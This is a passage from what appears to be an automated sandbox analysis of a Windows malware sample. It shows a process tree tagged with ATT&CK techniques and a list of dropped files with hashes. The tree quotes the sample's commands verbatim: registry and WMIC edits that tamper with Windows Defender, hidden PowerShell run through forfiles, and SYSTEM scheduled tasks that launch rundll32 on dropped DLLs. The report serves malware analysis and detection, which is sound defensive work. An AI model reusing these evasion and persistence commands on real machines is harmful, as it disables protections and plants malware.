                                                                                                                                                                                                      PID:2128
                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Indirect Command Execution
                                                                                                                                                                                                  PID:3596
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:2248
                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:2184
                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                                                                      PID:768
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        PID:3744
                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:3288
                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                                                                      PID:476
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        PID:2152
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                          PID:2404
                                                                                                                                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:3752
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /DELETE /F /TN "bAqRDoFVIdSJfWxTlj"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1920
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1740
                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                                            PID:3140
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:1576
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  PID:2452
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:3048
                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                                                PID:2220
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:2552
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                      PID:1552
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                          PID:3080
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BRWHUqYPU\vAyEFM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MHiaqjbnoCNpItK" /V1 /F
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                  PID:2180
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /CREATE /TN "MHiaqjbnoCNpItK2" /F /xml "C:\Program Files (x86)\BRWHUqYPU\MzZmkQt.xml" /RU "SYSTEM"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                  PID:3236
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /END /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:3280
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /DELETE /F /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:3948
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "YQZkeEGXXGJdtu" /F /xml "C:\Program Files (x86)\GqgEBhsSxktU2\eacWyAR.xml" /RU "SYSTEM"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                      PID:3208
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "cosGrOuVCynQy2" /F /xml "C:\ProgramData\PdOICyyFbClqQxVB\NTQuXfs.xml" /RU "SYSTEM"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                      PID:2012
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "PZmGxZPxdZZSPZWvU2" /F /xml "C:\Program Files (x86)\efiAzqQKrQpqActHLvR\qCgLUDx.xml" /RU "SYSTEM"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                      PID:3960
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "NzCzwfloobUmvfgYOrr2" /F /xml "C:\Program Files (x86)\OJMRwiGdhyaHC\gCgWvOJ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                      PID:2992
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "kjGlTxIfJQSbObiUU" /SC once /ST 18:51:42 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BbKTAQRj\KvhklyF.dll\",#1 /MWWdidN 385121" /V1 /F
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                      PID:2912
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /run /I /tn "kjGlTxIfJQSbObiUU"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                      PID:2368
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "wmPTb1" /SC once /ST 08:14:45 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                      PID:2716
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /run /I /tn "wmPTb1"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                      PID:2908
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /DELETE /F /TN "wmPTb1"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:780
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /DELETE /F /TN "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                        PID:2032
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 1548
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:660
                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\BbKTAQRj\KvhklyF.dll",#1 /MWWdidN 385121
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:3572
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\BbKTAQRj\KvhklyF.dll",#1 /MWWdidN 385121
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                          PID:996
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /DELETE /F /TN "kjGlTxIfJQSbObiUU"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                            PID:1992
                                                                                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:2964
                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:2620
                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "1877437844-8365864291009708643-410391127-19167992671292148110625015887856096337"
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:1984
                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "748182231-1346128582199718371612592970581287776577652350580-803386847-1606669053"
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:3628
                                                                                                                                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:3020

                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                2.1MB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                d9c17631ae488a7e322cc37cf7a1dbd8

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                2cc68707f6b8f066b76d3b2ddb14b00a66020e0b

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                9ff6d4badc693605cd62d95f06a9f62cc6c4b802f7834a7204caaca40f2b8f99

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                5e35ccf3cbcc2365dad9b0700f55a6fae2d9477b8b7388d2ed6eb3d80865298138589c27780781314e0b37dd1d066ab32d31718be5a279cf3ee24e2a812064e7

                                                                                                                                                                                                                              • C:\ProgramData\BFCFBFBF

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                92KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                2c87b2d541eecd3b4a69f502e63a5783

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                c3d1777df678cf4ef89ec8330f4d64f07fb26f9e

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                eae2daadf140785ff98f48909f57ec24b3138fc0744018ec84a4ff8932c3d638

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                502bd68d3ead4d794969b1db7dde114e0d3ded7fc52d81ab4e50c9d59ba74a0279426b54502301e2589929802b91ff8aa32d7e3d02a79d98209e540b40f7304c

                                                                                                                                                                                                                              • C:\ProgramData\HDGDHCGCBKFHJKEBKFBF

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                6KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                13ca89d884f655de858e042d786f3935

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                22c8bbf92ec9d62e3835efde2474285729bc2f84

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                7327a5e187f1b1652509421401ba41fbad4838a8c093662577d1933422c7b6b0

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                e05ca8de1fbedc608d964b7b61da4b722f4305bb240c0af54ebee0a628870f8ab8fe529a361545f6f92203951fff805f60b941ccf8ade8c4b67f895e81e13591

                                                                                                                                                                                                                              • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                593KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                a266bb7dcc38a562631361bbf61dd11b

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                3b1efd3a66ea28b16697394703a72ca340a05bd5

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                342B

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                e49fa66066eaefa92226ed0c7516fe07

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                66ce7e06fe2d79646e45bf9d03cd3533fcc567c8

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                6f626f58817c98aeefa300a69a7a2304d2e409a422c9f609a42167d8e0fd13d5

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                c9a05a09188585916e6e885fb24283f4d6c2bdecb9e10b423a857e3db8a4413171122ffe48e893b1739d4637237c8a614e73e48ac032165c37fe63943f1b31a3

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                242B

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                f606427ddc0dac2cec61a0d982fac225

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                9845b34fe1ed6ef5ea1864f7e43f6ea4aa6047a7

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                b4101126124750d648229b309d01f531d32d8071325d4a4b7615548e6b0426da

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                49daeadbc69edc81866a689764bb219ca63dcd0f8cd6dc676f2fbcfc21cecc9f6de10f7f41e2d775a8e4cfd91ff9e6aa8f95d478848982a0eebf65d8f335df61

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                187B

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                136B

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                150B

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                10KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                0461353ce49d01fcd9d2ee07e5519527

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                e10fc280dae2316484c3e6e1e8b295c9bb07034f

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                faac8c273b989dfb6be5e2bcf16bd504e01db2e7c5f8c5589a21174b8e68e207

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                ec85588cb9b23255feb11b2ef35598fb78c991de55256c71f59d3d042d6a1a9e5a42fb0e4a89b8f941b90861fac6c11a5583189620855f490c37a8c9c3fa8bdd

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WHDSWW5V\nss3[1].dll

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YW15VCHK\download[1].htm

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1B

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                cfcd208495d565ef66e7dff9f98764da

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\39ptzwfm.default-release\activity-stream.discovery_stream.json.tmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                5001c6e742adb133d7142f7c1951c029

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                fc40159eeb22000b46fb5e59e31e2c137745ed4b

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                01675ed8f17ea2405e9e023649eba1af1884fda5a4e9d352d104d7216b7685c2

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                4493934688625efa5c84af026fcc54609b20483e8c1f38e943bef13b9b0fc37f5e8773ff42601041b3be41f0a6b395e19d7a5d55e5a9ec0743bb88a76b5e4bbb

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\39ptzwfm.default-release\cache2\entries\231F6B263D5AE6E66E1C79EA4CCE5FFA71CAAF7A

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                95KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                c3907d746ed9eaaca40952097eb3a90e

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                1a16947ffac68defa5b72f662160a38e7df4404e

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                23c3c678ff69ae37a4a13be6497738368b73fd4bf546ad77a17f154c7d1178d7

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                b77ddce8fc4f9a2ba930c916629ceccaf5ba41edb36b3a4b8aabff7f452e6894213b2a7dc43f565cfa73283183dc3306a706831a81203f66415268cca9140f6a

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\39ptzwfm.default-release\cache2\entries\3F6BAE390F7FB4267066C23DBD35348B57989359

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                47KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                34347ce76a0d76c437c47c6472369aa0

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                29f07ea9ff063e24c7144506e8cb992576c10c21

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                9ef61fb50cac23620f20a9f900a498015e7b13c4d0d72ff54b528bc55e702924

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                d711579d32ecd0155bd5fa86829e09ef9de1c2de3bd250bd03cc2719098dfdf7c72965aa5921a51987559a10b38fea941514e9c0371cc793569a414828d71f60

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\39ptzwfm.default-release\cache2\entries\46D4A26FC546A00EAF10CD859BDC3E42852FBCFE

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                23KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                99fd2d8df4cfba7068d854e6ab83b165

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                60b508e9b5c9844e6d45c78d9a8a4de8dc3d24b4

                                                                                                                                                                                                                                SHA256

